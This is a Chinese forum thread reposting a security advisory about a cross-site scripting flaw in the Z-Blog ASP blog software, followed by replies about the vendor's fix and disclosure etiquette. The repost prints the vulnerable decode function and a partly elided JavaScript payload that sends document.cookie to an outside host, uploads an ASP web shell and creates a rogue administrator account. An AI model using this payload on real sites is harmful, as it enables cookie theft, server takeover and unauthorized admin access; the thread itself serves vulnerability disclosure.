Visl.X

自己一直比较关注安全，最近也在关注XSS。没想到刚就在80sec看到了Z-blog的漏洞。期待官方尽快解决。
          注：漏洞为80sec发现与公布，http://www.80sec.com
漏洞状态：已经联系官方，请等待官方公告。
               
        本站内容均为原创，转载请务必保留署名与链接！
        Z-blog跨站脚本攻击漏洞:http://www.80sec.com/zbog-xss.html


漏洞说明：Z-Blog是一款基于Asp平台的Blog博客(网志)程序，支持Wap，支持Firefox，Oprea等浏览器，在国内使用非常广泛，官方主页在http://www.rainbowsoft.org/。Z-blog代码严谨，前台功能简洁，后台功能强大，这为它的产品安全带来很大的优势，但是80sec在产品中发现一个严重的跨站脚本攻击漏洞，加上产品设计上的一些问题可能带来严重的后果。


漏洞厂商：http://www.rainbowsoft.org/
漏洞解析：在FUNCTION/c_urlredirect.asp中，程序对提交的url参数做如下处理

strUrl=URLDecodeForAntiSpam(Request.QueryString("url"))
        其中URLDecodeForAntiSpam是防止垃圾连接的解码函数，其函数处理如下

Function URLDecodeForAntiSpam(strUrl)
        Dim i,s
        For i =1 To Len(strUrl) Step 2
                s=s & Mid(strUrl,i,1)
        Next
        URLDecodeForAntiSpam=s
End Function

        在做如上处理之后程序将在c_urlredirect.asp输出url参数

...
        <meta http-equiv="refresh" chttp://www.80sec.com/c.php?c="+escape(document.cookie);
//get a shell
data="txaContent=<%25execute(request(%22a%22))%25>“;
postmydata(”http://www.0×37.com/cmd.asp?act=SiteFilePst&path=%2E%2FUPLOAD%2Findex%2Easp&opath=”,data);
//add a userdata=”edtID=0&edtLevel=2&edtName=xss2root&edtPassWord=d073d5454ffe92bdcd3cbcb77d149df5&edtPassWordRe=xss2root&edtEmail=null@null.com&edtHomePage=&edtAlias=”;
postmydata(”http://www.0×37.com/cmd.asp?act=UserCrt”,data);
//fool the user
window.location=tolocation;
function poster(){
    var request = false;
    if(window.XMLHttpRequest) {
      request = new XMLHttpRequest();
      if(request.overrideMimeType) {
        request.overrideMimeType(’text/xml’);
      }
    } else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP','Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP'];
      for(var i=0; i
        try {
          request = new ActiveXObject(versions);
        } catch(e) {}
      }
    }
    return request;
}
function postmydata(action,data){
    xmlhttp.open("POST", action, false);
    xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xmlhttp.send(data);
        return xmlhttp.responseText;
}


其中有句话“z-blog的所有安全设计全部用来抵御前台的攻击，对于后台基本没有任何限制”，值得z-blog官方注意。下步是不是该对后台做安全方面的设计呢？？ 很是期待。

zl030

前排支持 期待啊

wolfit

washun

强悍
看不懂 天书一样

Visl.X

记得这次z-blog新版发布时说，有安全团队负责代码安全审计。 当时还看见H_4冒泡，不错的话，应该是BCT吧？？  80sec是剑心他们新成立的安全web团队，和BCT也有关系啊，为什么不等Z-BLOG修复了这个漏洞再发布公告呢？？  现在突然就发布了，恐慌中.....

Visl.X

我转过来，中间有些代码 .... 省略了的，不想被人利用。 官方还是去80sec看看吧。 那里有详细的分析。

washun

漏洞已修复，请自动升级到最新版或者直接覆盖FUNCTION/c_function.asp 见 http://download.rainbowsoft.org/programs/zblog18spirit/

80sec不厚道！！

Visl.X

谢谢，这么快就修复了。谢谢Z-blog ！
    80sec确实不厚道。  哈哈 ...

J.wei

修复啦，支持一下呢

h4k_b4n

对于这次漏洞是因为我们Codefense(BCT)的一个疏忽，因为今天在公司就已经发现了问题，下班的时候没有来得及发布报告给官方导致了这次的事件的发生，而且这次80sec和我们事先可能在沟通上没有做好而导致！不存在谁不厚道的问题，最终的责任还是因为我们作为代码检测方没有做到代码安全应急处理，所以我作为Codefense(BCT)的负责人，先跟大家道歉，实在不好意思。我们将今天提交另外一个漏洞给官方的！

马夹

另外一个漏洞.............

h4k_b4n

昨天下午六点多的时候发现了已经修补的一个XSS和另外一个XSS漏洞！但是没有来得及在公司完成报告撰写和提交，所以导致这次的事情！